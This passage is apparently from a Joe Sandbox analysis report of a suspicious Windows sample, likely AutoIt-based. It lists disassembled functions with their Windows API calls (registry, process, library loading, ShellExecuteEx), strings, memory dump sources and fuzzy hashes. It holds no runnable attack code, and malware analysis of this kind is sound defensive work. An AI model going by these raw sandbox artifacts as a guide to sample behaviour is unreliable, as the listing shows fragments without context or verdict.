                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 000D188B
                                        • CloseHandle.KERNEL32(?), ref: 000D1894
                                        • CloseHandle.KERNEL32(?), ref: 000D189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D18A5
                                        • HeapFree.KERNEL32(00000000), ref: 000D18AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: 2744387a037fda3d1ee8a87e48e9bd98ddc79674c1e2d133e422925910b27894
                                        • Instruction ID: a6936eb94975adba3fe8d8b812550aef2f0ad49aa717fb75b1b74f77b6956fc8
                                        • Opcode Fuzzy Hash: 2744387a037fda3d1ee8a87e48e9bd98ddc79674c1e2d133e422925910b27894
                                        • Instruction Fuzzy Hash: D2E0C236004101FBDA015BA1ED0C90ABB39FB4DB22B108320F2A5858B0CBB294A0DF90
                                        Function 000DC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000DC6EE
                                        • _wcslen.LIBCMT ref: 000DC735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000DC79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000DC7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: a58a31ff47f15be5e5c28e322e5b3d463d14aef065b5f43713608484809531c1
                                        • Instruction ID: aed26ca9cd8e183c52bfc152edf71325757b790e19d2f1cacff1af5d7a901d09
                                        • Opcode Fuzzy Hash: a58a31ff47f15be5e5c28e322e5b3d463d14aef065b5f43713608484809531c1
                                        • Instruction Fuzzy Hash: 1A51B0716083029BE7A49F28C885FAB77E4AF45314F040A2EF995D32E1DB74D944DF62
                                        Function 000FAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 000FAEA3
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • GetProcessId.KERNEL32(00000000), ref: 000FAF38
                                        • CloseHandle.KERNEL32(00000000), ref: 000FAF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: 85149cf1ce876a442180f5cb7016a9de5b0568585fe373d3502a9f8e37059178
                                        • Instruction ID: 52e968d6cca134f2e76165639f0dfd64cdc5388a863c2d150febbb34514dd2dc
                                        • Opcode Fuzzy Hash: 85149cf1ce876a442180f5cb7016a9de5b0568585fe373d3502a9f8e37059178
                                        • Instruction Fuzzy Hash: 78718B70A00619DFCB14DF64C484AAEBBF0FF09310F0484A9E85AAB762C774ED45CB91
                                        Function 000D719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000D7206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000D723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000D724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000D72CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: 9331b2efe5a1049f79bccaf3d3f2b40a343ae851f3da8281f06b17cdbe2acbbf
                                        • Instruction ID: a06c91a517154c61818150808e23b7b757601b669010fd6fb2522861d8202179
                                        • Opcode Fuzzy Hash: 9331b2efe5a1049f79bccaf3d3f2b40a343ae851f3da8281f06b17cdbe2acbbf
                                        • Instruction Fuzzy Hash: CF413F71A04304EFDB25CF54C885AAA7BA9EF44310F1481AEBD099F34AE7B5D945CBB0
                                        Function 00103D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00103E35
                                        • IsMenu.USER32(?), ref: 00103E4A
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00103E92
                                        • DrawMenuBar.USER32 ref: 00103EA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: bef59324f0a8a19bf05e8d14e230295a6a1c50f45f1f9c0b58a91ffddb6324a0
                                        • Instruction ID: 830c8b010114fcba68b3f891d9c942b2ccc2606422920d65a7f3e384efa70300
                                        • Opcode Fuzzy Hash: bef59324f0a8a19bf05e8d14e230295a6a1c50f45f1f9c0b58a91ffddb6324a0
                                        • Instruction Fuzzy Hash: 3B413B75A01209EFDB10DF50D884EEABBB9FF49354F044229F99597290D7B0AE45CF90
                                        Function 000D1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000D1E66
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000D1E79
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 000D1EA9
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: c23f19641fdd6013ad63352fb46749866fe5c4f4d22e8bf4d233a9a7dbf63b52
                                        • Instruction ID: 2a6025d2fb9941b2e2ed963a557f36e6273feff6751a948a944cb651947527b8
                                        • Opcode Fuzzy Hash: c23f19641fdd6013ad63352fb46749866fe5c4f4d22e8bf4d233a9a7dbf63b52
                                        • Instruction Fuzzy Hash: FD212971A00204BEDB14AB64DC46CFFB7B9EF45354B14411AF815A72E2DF7949468B70
                                        Function 000FC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                                        • API String ID: 176396367-4004644295
                                        • Opcode ID: a5d0f7b092590d3b814ebdd58371ef5c3e8672a268c2bd91240125a630138c2c
                                        • Instruction ID: 47e516a017ec2ee90f9cab2568854bf01f4122f54312bf514109043741de40f5
                                        • Opcode Fuzzy Hash: a5d0f7b092590d3b814ebdd58371ef5c3e8672a268c2bd91240125a630138c2c
                                        • Instruction Fuzzy Hash: 47314B73A0016D4BEB70DF2C8B53CBE33D15BA1758F054019E9056BA45EA71ED80F3A2
                                        Function 00102F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00102F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 00102F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00102FA9
                                        • DestroyWindow.USER32(?), ref: 00102FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: fa7f54da953fadf90206fde5ba92bf06463172d14758f91dc6458023001cb4c6
                                        • Instruction ID: 29ae5405e373f2db4e628cfa558fc6815ada86ae0835d52acec2edd9f7222bb4
                                        • Opcode Fuzzy Hash: fa7f54da953fadf90206fde5ba92bf06463172d14758f91dc6458023001cb4c6
                                        • Instruction Fuzzy Hash: D121C07120020AABEB215F64DC88FBB77BDEB593A4F104618F990D31D0D7B1DC919B60
                                        Function 00094D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00094D1E,000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002), ref: 00094D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00094DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00094D1E,000A28E9,?,00094CBE,000A28E9,001388B8,0000000C,00094E15,000A28E9,00000002,00000000), ref: 00094DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: f323b552b80345d643143d367a2c9639cc12b39f7c6de96cad85044eff34434c
                                        • Instruction ID: 40b73d566a1e018c0a9dd42274cbe22fb117953cc4b829d05e807f5fc5844f89
                                        • Opcode Fuzzy Hash: f323b552b80345d643143d367a2c9639cc12b39f7c6de96cad85044eff34434c
                                        • Instruction Fuzzy Hash: 2EF0AF38A00208BBDB159F90DC49BEDBBF4EF48712F0001A8F849A26A0DBB059C1DFD1
                                        Function 000CD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 000CD3AD
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000CD3BF
                                        • FreeLibrary.KERNEL32(00000000), ref: 000CD3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 820d921c63c8c8dcaa5acafb19983e29432d2c0323dbaf7b025faf65caf55a69
                                        • Instruction ID: 8763ad3e11730dc4731eb38f1df08d803b26cceb0f3d4ce11d62bb049f15c82e
                                        • Opcode Fuzzy Hash: 820d921c63c8c8dcaa5acafb19983e29432d2c0323dbaf7b025faf65caf55a69
                                        • Instruction Fuzzy Hash: 03F02071806621ABD7B127208C28F6E7760BF21701F65826FF486F2091DBB0CE808BC2
                                        Function 00074E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00074EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: 804ce552be072d4af514d68f09594e7b791dc061def6060fecd7a027ddebcdc4
                                        • Instruction ID: 1beec165f3e67058a60ec2b8f703b7caaea5ef23162a9d15412374cf09f2f4bb
                                        • Opcode Fuzzy Hash: 804ce552be072d4af514d68f09594e7b791dc061def6060fecd7a027ddebcdc4
                                        • Instruction Fuzzy Hash: F5E0CD36E015229BD27117256C18B6F75D4EF81F72B054215FC44D2140DBF8CD418CF8
                                        Function 00074E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00074E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c4c3dfad4479686b121ec8492bfd0c29334095dae0ff3912482db2aab1371eff
                                        • Instruction ID: ccd3e62b4a556c9b55b722ba189ab3fe3ea0999002efdf62e44d7ea1b155b87e
                                        • Opcode Fuzzy Hash: c4c3dfad4479686b121ec8492bfd0c29334095dae0ff3912482db2aab1371eff
                                        • Instruction Fuzzy Hash: 1CD0C23290262197C6221B246C08DCB2A5CEF86B613054310B848E2150CFB8CD418AD8
                                        Function 000FA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 000FA427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000FA435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000FA468
                                        • CloseHandle.KERNEL32(?), ref: 000FA63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: b7ed8aae37ab099c6085535a57aa628845a9f0e5853de6ece44b4431db82648f
                                        • Instruction ID: 28fc6feebf2cf229f6a0039298b7b80e07307168106a7d9a9c7d88878d542468
                                        • Opcode Fuzzy Hash: b7ed8aae37ab099c6085535a57aa628845a9f0e5853de6ece44b4431db82648f
                                        • Instruction Fuzzy Hash: 15A1A0B16047019FD720DF24C882F6AB7E5AF84714F14881DF59E9B692DBB4EC418B92
                                        Function 000DE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000DCF22,?), ref: 000DDDFD
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000DCF22,?), ref: 000DDE16
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 000DE473
                                        • MoveFileW.KERNEL32(?,?), ref: 000DE4AC
                                        • _wcslen.LIBCMT ref: 000DE5EB
                                        • _wcslen.LIBCMT ref: 000DE603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 000DE650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: 1eb4d2f0f6dd21780d5a96c272c98cd113c463b05b340656055fc7ae512157a3
                                        • Instruction ID: 14b0a33a6ba613884dc4c84736782b5660dc375a93549e882c183c6da1997038
                                        • Opcode Fuzzy Hash: 1eb4d2f0f6dd21780d5a96c272c98cd113c463b05b340656055fc7ae512157a3
                                        • Instruction Fuzzy Hash: 4B5161B24087855BC764EB94DC819DF73DCAF84340F00491FF689D7292EE74A5888B6A
                                        Function 000FB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FBB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000FBB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 000FBBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: a055e1a80047c87f5e08906d22e020d83b3da889403283ed23041cec5e30ee4a
                                        • Instruction ID: 0c14f3ad6608c29cf8569ec20a62c2551dcd0fece5028c888c9b02655beb645f
                                        • Opcode Fuzzy Hash: a055e1a80047c87f5e08906d22e020d83b3da889403283ed23041cec5e30ee4a
                                        • Instruction Fuzzy Hash: 52619A31208205AFD314DF24C891E6ABBE5FF84308F54899CF5998B6A2CB71ED45DF92
                                        Function 000D8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000D8BCD
                                        • VariantClear.OLEAUT32 ref: 000D8C3E
                                        • VariantClear.OLEAUT32 ref: 000D8C9D
                                        • VariantClear.OLEAUT32(?), ref: 000D8D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000D8D3B
                                        Memory Dump Source
